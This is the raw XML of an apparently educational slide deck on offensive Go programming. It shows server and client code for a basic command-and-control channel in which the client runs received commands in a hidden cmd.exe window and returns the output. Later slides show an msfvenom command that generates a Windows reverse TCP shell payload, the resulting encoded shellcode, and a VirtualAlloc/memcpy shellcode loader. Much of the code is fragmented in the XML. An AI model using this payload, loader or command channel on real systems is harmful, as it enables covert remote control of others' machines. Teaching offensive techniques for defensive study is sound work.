            </a:r>
            <a:endParaRPr i="1">
              <a:solidFill>
                <a:schemeClr val="lt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21" name="Google Shape;221;g16500817a65_2_22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3368825" y="4070700"/>
            <a:ext cx="6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/out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g16500817a65_2_22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="983800" y="3326150"/>
            <a:ext cx="9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stdin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3" name="Google Shape;223;g16500817a65_2_22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="834725" y="3943750"/>
            <a:ext cx="10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stdout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4" name="Google Shape;224;g16500817a65_2_22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3368825" y="3463900"/>
            <a:ext cx="6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/cmd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" name="Google Shape;225;g16500817a65_2_22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9480700" y="3595900"/>
            <a:ext cx="14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command req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6" name="Google Shape;226;g16500817a65_2_22"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="225" idx="1"/>
            <a:endCxn id="224" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4043500" y="3664000"/>
            <a:ext cx="5437200" cy="1320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g16500817a65_2_22"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="222" idx="3"/>
            <a:endCxn id="224" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1901200" y="3526250"/>
            <a:ext cx="1467600" cy="137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g16500817a65_2_22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9480700" y="3951500"/>
            <a:ext cx="14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exec command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9" name="Google Shape;229;g16500817a65_2_22"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="224" idx="2"/>
            <a:endCxn id="228" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3706175" y="3864100"/>
            <a:ext cx="5774400" cy="287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g16500817a65_2_22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9412000" y="4497900"/>
            <a:ext cx="14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stdout req</a:t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1" name="Google Shape;231;g16500817a65_2_22"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="228" idx="2"/>
            <a:endCxn id="230" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="10145950" y="4351700"/>
            <a:ext cx="68700" cy="146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g16500817a65_2_22"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="230" idx="1"/>
            <a:endCxn id="221" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4043500" y="4270800"/>
            <a:ext cx="5368500" cy="427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g16500817a65_2_22"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="221" idx="1"/>
            <a:endCxn id="223" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1906025" y="4143900"/>
            <a:ext cx="1462800" cy="126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g16500817a65_2_22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3664575" y="3827450"/>
            <a:ext cx="7922375" cy="1429400"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="57176" w="316895">
                <a:moveTo>
                  <a:pt x="0" y="23733"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="33815" y="29240"/>
                  <a:pt x="152788" y="54058"/>
                  <a:pt x="202890" y="56772"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="252992" y="59487"/>
                  <a:pt x="281843" y="47931"/>
                  <a:pt x="300612" y="40020"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="319381" y="32109"/>
                  <a:pt x="317907" y="15977"/>
                  <a:pt x="315503" y="9307"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="313099" y="2637"/>
                  <a:pt x="291072" y="1551"/>
                  <a:pt x="286186" y="0"/>
                </a:cubicBez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5" name="Google Shape;235;g16500817a65_2_22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="599400" y="3526250"/>
            <a:ext cx="384400" cy="616575"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="24663" w="15376">
                <a:moveTo>
                  <a:pt x="8861" y="24663"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="7543" y="23422"/>
                  <a:pt x="2113" y="20552"/>
                  <a:pt x="950" y="17217"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-213" y="13882"/>
                  <a:pt x="-523" y="7523"/>
                  <a:pt x="1881" y="4653"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4285" y="1784"/>
                  <a:pt x="13127" y="776"/>
                  <a:pt x="15376" y="0"/>
                </a:cubicBez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6" name="Google Shape;236;g16500817a65_2_22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9480700" y="1165200"/>
            <a:ext cx="14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-PL">
                <a:solidFill>
                  <a:schemeClr val="lt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HTTP client</a:t>
            </a:r>
            <a:endParaRPr i="1">
              <a:solidFill>
                <a:schemeClr val="lt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g163cfafd9d1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12" y="6280461"/>
            <a:ext cx="991344" cy="31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g163cfafd9d1_0_27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4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g163cfafd9d1_0_27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8567737" y="6400366"/>
            <a:ext cx="2743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63cfafd9d1_0_27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="619950" y="386200"/>
            <a:ext cx="4337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900">
                <a:solidFill>
                  <a:srgbClr val="00F750"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>SERVER SIDE CODE</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2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5" name="Google Shape;245;g163cfafd9d1_0_27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639850" y="1108875"/>
            <a:ext cx="45252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comma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nd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make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(chan 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ake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(chan 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6" name="Google Shape;246;g163cfafd9d1_0_27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639850" y="2312450"/>
            <a:ext cx="5712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func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go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commandPrompt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http.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HandleFunc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"/cmd"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handleCmd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http.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HandleFunc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"/out"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handleOut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http.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ListenAndServe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":8888"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nil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47" name="Google Shape;247;g163cfafd9d1_0_27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6464400" y="972700"/>
            <a:ext cx="54309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func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commandPrompt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:=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bufio.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NewReader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(os.Stdin)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fmt.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"cmd&gt; "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_ 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:=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ReadString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'\n'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strings.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l-PL" sz="17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"\n"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l-PL" sz="17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l-PL" sz="17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command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&lt;- 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endParaRPr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:=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&lt;-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endParaRPr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fmt.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48" name="Google Shape;248;g163cfafd9d1_0_27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2180500" y="4373150"/>
            <a:ext cx="2630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func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handleCmd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:=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&lt;-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command</a:t>
            </a:r>
            <a:endParaRPr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9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9" name="Google Shape;249;g163cfafd9d1_0_27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5725375" y="4296950"/>
            <a:ext cx="4710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func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handleOut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_ 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:=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ioutil.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ReadAll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.Body)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&lt;- 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g14a8f0ce735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12" y="6280461"/>
            <a:ext cx="991344" cy="31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g14a8f0ce735_0_6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4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6" name="Google Shape;256;g14a8f0ce735_0_6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8567737" y="6400366"/>
            <a:ext cx="2743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4a8f0ce735_0_6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="619950" y="386200"/>
            <a:ext cx="4337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900">
                <a:solidFill>
                  <a:srgbClr val="00F750"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>CLIENT SIDE CODE</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2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" name="Google Shape;258;g14a8f0ce735_0_6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="619950" y="1484325"/>
            <a:ext cx="109521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func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_ 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:=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http.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"http://127.0.0.1:8888/cmd"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_ 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:=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ioutil.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ReadAll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.Body)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:=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[]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pl-PL" sz="17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"/C"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append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strings.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Fields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]))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cmd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:=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exec.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Command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"cmd"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cmd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.SysProcAttr = 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syscall.SysProcAttr{HideWindow: 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_ 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:=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cmd.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CombinedOutput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_ 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http.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"http://172.0.0.1:8888/out"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l-PL" sz="17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"text/plain"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bytes.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NewReader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3cfafd9d1_0_40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1893150" y="3115050"/>
            <a:ext cx="8405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section</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="pl-PL" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="00F750"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> .</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="pl-PL" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="00F750"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>INTRO_TO_GOLANG</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3200">
              <a:solidFill>
                <a:srgbClr val="00F7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63d2b3b0f7_0_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2933250" y="2789950"/>
            <a:ext cx="6325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9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file:///</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="pl-PL" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="00F750"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>SHELLCODE_LOADER</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="pl-PL" sz="29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.go</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="29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163d2b3b0f7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12" y="6280461"/>
            <a:ext cx="991344" cy="31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g163d2b3b0f7_0_12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4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0" name="Google Shape;270;g163d2b3b0f7_0_12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8567737" y="6400366"/>
            <a:ext cx="2743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63d2b3b0f7_0_12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="619950" y="386200"/>
            <a:ext cx="4961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900">
                <a:solidFill>
                  <a:srgbClr val="00F750"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>GENERATING SHELLCODE</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2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2" name="Google Shape;272;g163d2b3b0f7_0_12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620025" y="1053525"/>
            <a:ext cx="10952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5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pl-PL" sz="15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msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL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-p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="15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windows/x64/shell_reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL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LHOST="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="15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10.0.0.5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL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 LPORT=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="15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4242</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL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-f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="15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base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL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-o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="15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shellcode</a:t>
            </a:r>
            <a:endParaRPr sz="15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3" name="Google Shape;273;g163d2b3b0f7_0_12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="798975" y="2211500"/>
            <a:ext cx="10899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3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2F 45 69 44 35 50 44 6F 77 41 41 41 41 45 46 52 51 56 42 53 55 56 5A 49 4D 64 4A 6C 53 49 74 53 59 45 69 4C 55 68 68 49 69 31 49 67 53 49 74 79 55 45 67 50 74 30 70 4B 54 54 48 4A 53 44 48 41 72 44 78 68 66 41 49 73 49 45 48 42 79 51 31 42 41 63 48 69 37 56 4A 42 55 55 69 4C 55 69 43 4C 51 6A 78 49 41 64 43 4C 67 49 67 41 41 41 42 49 68 63 42 30 5A 30 67 42 30 46 43 4C 53 42 68 45 69 30 41 67 53 51 48 51 34 31 5A 49 2F 38 6C 42 69 7A 53 49 53 41 48 57 54 54 48 4A 53 44 48 41 72 45 48 42 79 51 31 42 41 63 45 34 34 48 58 78 54 41 4E 4D 4A 41 68 46 4F 64 46 31 32 46 68 45 69 30 41 6B 53 51 48 51 5A 6B 47 4C 44 45 68 45 69 30 41 63 53 51 48 51 51 59 73 45 69 45 67 42 30 45 46 59 51 56 68 65 57 56 70 42 57 45 46 5A 51 56 70 49 67 2B 77 67 51 56 4C 2F 34 46 68 42 57 56 70 49 69 78 4C 70 56 2F 2F 2F 2F 31 31 4A 76 6E 64 7A 4D 6C 38 7A 4D 67 41 41 51 56 5A 4A 69 65 5A 49 67 65 79 67 41 51 41 41 53 59 6E 6C 53 62 77 43 41 42 43 53 43 67 41 41 42 55 46 55 53 59 6E 6B 54 49 6E 78 51 62 70 4D 64 79 59 48 2F 39 56 4D 69 65 70 6F 41 51 45 41 41 46 6C 42 75 69 6D 41 61 77 44 2F 31 56 42 51 54 54 48 4A 54 54 48 41 53 50 2F 41 53 49 6E 43 53 50 2F 41 53 49 6E 42 51 62 72 71 44 39 2F 67 2F 39 56 49 69 63 64 71 45 45 46 59 54 49 6E 69 53 49 6E 35 51 62 71 5A 70 58 52 68 2F 39 56 49 67 63 52 41 41 67 41 41 53 62 68 6A 62 57 51 41 41 41 41 41 41 45 46 51 51 56 42 49 69 65 4A 58 56 31 64 4E 4D 63 42 71 44 56 6C 42 55 4F 4C 38 5A 73 64 45 4A 46 51 42 41 55 69 4E 52 43 51 59 78 67 42 6F 53 49 6E 6D 56 6C 42 42 55 45 46 51 51 56 42 4A 2F 38 42 42 55 45 6E 2F 79 45 32 4A 77 55 79 4A 77 55 47 36 65 63 77 2F 68 76 2F 56 53 44 48 53 53 50 2F 4B 69 77 35 42 75 67 69 48 48 57 44 2F 31 62 76 77 74 61 4A 57 51 62 71 6D 6C 62 32 64 2F 39 56 49 67 38 51 6F 50 41 5A 38 43 6F 44 37 34 48 55 46 75 30 63 54 63 6D 39 71 41 46 6C 42 69 64 72 2F 31 51 3D 3D</a:t>
            </a:r>
            <a:endParaRPr sz="13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4" name="Google Shape;274;g163d2b3b0f7_0_12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="798975" y="1423825"/>
            <a:ext cx="684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Payload size: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="15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460 bytes</a:t>
            </a:r>
            <a:endParaRPr sz="15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Final size of base64 encoded: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="15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616 bytes</a:t>
            </a:r>
            <a:endParaRPr sz="15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g163d2b3b0f7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12" y="6280461"/>
            <a:ext cx="991344" cy="31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g163d2b3b0f7_0_38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4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1" name="Google Shape;281;g163d2b3b0f7_0_38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8567737" y="6400366"/>
            <a:ext cx="2743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63d2b3b0f7_0_38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="619950" y="386200"/>
            <a:ext cx="9064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900">
                <a:solidFill>
                  <a:srgbClr val="00F750"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>HOW TO ALLOCATE MEMORY PAGE ON WINDOWS</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2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3" name="Google Shape;283;g163d2b3b0f7_0_38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="619950" y="2349600"/>
            <a:ext cx="65637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9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LPVOID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="19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VirtualAlloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="19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9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9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[in, optional] LPVOID lpAddress,</a:t>
            </a:r>
            <a:endParaRPr sz="19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9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[in]           SIZE_T dwSize,</a:t>
            </a:r>
            <a:endParaRPr sz="19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9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[in]           DWORD  flAllocationType,</a:t>
            </a:r>
            <a:endParaRPr sz="19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9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[in]           DWORD  flProtect</a:t>
            </a:r>
            <a:endParaRPr sz="19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9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9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84" name="Google Shape;284;g163d2b3b0f7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9588" y="1484324"/>
            <a:ext cx="3809938" cy="38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63d2b3b0f7_0_38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="619950" y="1137800"/>
            <a:ext cx="611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-PL">
                <a:solidFill>
                  <a:srgbClr val="D9D9D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Reserves, commits, or changes the state of a region of pages in the virtual address space of the calling process. Memory allocated by this function is automatically initialized to zero.</a:t>
            </a:r>
            <a:endParaRPr i="1">
              <a:solidFill>
                <a:srgbClr val="D9D9D9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6" name="Google Shape;286;g163d2b3b0f7_0_38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6655425" y="3702575"/>
            <a:ext cx="461450" cy="911250"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="36450" w="18458">
                <a:moveTo>
                  <a:pt x="1384" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="4229" y="1000"/>
                  <a:pt x="18686" y="-77"/>
                  <a:pt x="18455" y="5998"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18224" y="12073"/>
                  <a:pt x="3076" y="31375"/>
                  <a:pt x="0" y="36450"/>
                </a:cubicBez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287" name="Google Shape;287;g163d2b3b0f7_0_38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4183650" y="46735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5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MEM_COMMIT | MEM_RESERVE</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="288" name="Google Shape;288;g163d2b3b0f7_0_38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4183650" y="5023813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0x1000 + 0x2000 = 0x3000</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="289" name="Google Shape;289;g163d2b3b0f7_0_38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2987450" y="4163975"/>
            <a:ext cx="1430275" cy="1020375"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="40815" w="57211">
                <a:moveTo>
                  <a:pt x="57211" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="51444" y="6075"/>
                  <a:pt x="32142" y="29682"/>
                  <a:pt x="22607" y="36449"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13072" y="43216"/>
                  <a:pt x="3768" y="39909"/>
                  <a:pt x="0" y="40601"/>
                </a:cubicBez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290" name="Google Shape;290;g163d2b3b0f7_0_38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="205200" y="49778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5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PAGE_EXECUTE_READWRITE</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="15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1" name="Google Shape;291;g163d2b3b0f7_0_38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264350" y="5317125"/>
            <a:ext cx="727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0x40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g163d2b3b0f7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12" y="6280461"/>
            <a:ext cx="991344" cy="31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g163d2b3b0f7_0_27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4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8" name="Google Shape;298;g163d2b3b0f7_0_27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8567737" y="6400366"/>
            <a:ext cx="2743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63d2b3b0f7_0_27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="619950" y="386200"/>
            <a:ext cx="6131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900">
                <a:solidFill>
                  <a:srgbClr val="00F750"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>IMPORT WINAPI FUNCTIONS</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2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g163d2b3b0f7_0_27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="619950" y="1347775"/>
            <a:ext cx="109521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// #include &lt;string.h&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="20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import "C"</a:t>
            </a:r>
            <a:endParaRPr sz="20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pl-PL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l-PL" sz="20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"syscall"</a:t>
            </a:r>
            <a:endParaRPr sz="20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l-PL" sz="20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"unsafe"</a:t>
            </a:r>
            <a:endParaRPr sz="20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pl-PL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l-PL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kernel32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL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20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l-PL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syscall.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="00FE50"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>MustLoadDLL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL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20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"kernel32.dll"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL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l-PL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VirtualAlloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL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20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l-PL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kernel32.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="00FE50"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>MustFindProc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL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20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"VirtualAlloc"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL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1" name="Google Shape;301;g163d2b3b0f7_0_27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3696425" y="1859225"/>
            <a:ext cx="701250" cy="329700"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="13188" w="28050">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1109" y="2060"/>
                  <a:pt x="1981" y="10380"/>
                  <a:pt x="6656" y="12361"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11331" y="14342"/>
                  <a:pt x="24484" y="11964"/>
                  <a:pt x="28050" y="11885"/>
                </a:cubicBez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302" name="Google Shape;302;g163d2b3b0f7_0_27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4457100" y="1859225"/>
            <a:ext cx="137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memcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL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3" name="Google Shape;303;g163d2b3b0f7_0_27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6354550" y="202407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B949E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g163d2b3b0f7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12" y="6280461"/>
            <a:ext cx="991344" cy="31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g163d2b3b0f7_0_52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4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0" name="Google Shape;310;g163d2b3b0f7_0_52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8567737" y="6400366"/>
            <a:ext cx="2743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63d2b3b0f7_0_52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="619950" y="386200"/>
            <a:ext cx="3360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900">
                <a:solidFill>
                  <a:srgbClr val="00F750"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>WRAP IT ALL UP</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2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2" name="Google Shape;312;g163d2b3b0f7_0_52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="619950" y="1052525"/>
            <a:ext cx="10243500" cy="5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func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17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buff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:=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make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([]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byte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base64.StdEncoding.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DecodedLen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enc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)))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_ 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:=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base64.StdEncoding.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Decode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buff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enc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dec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:=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buff[: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addr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_, _ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="17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:=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VirtualAlloc.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Call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l-PL" sz="17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uintptr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dec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)),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l-PL" sz="17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0x3000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l-PL" sz="17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0x40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C.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memcpy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(unsafe.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Pointer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addr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), unsafe.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Pointer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(&amp;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dec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l-PL" sz="17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]), C.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size_t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dec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)))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syscall.</a:t>
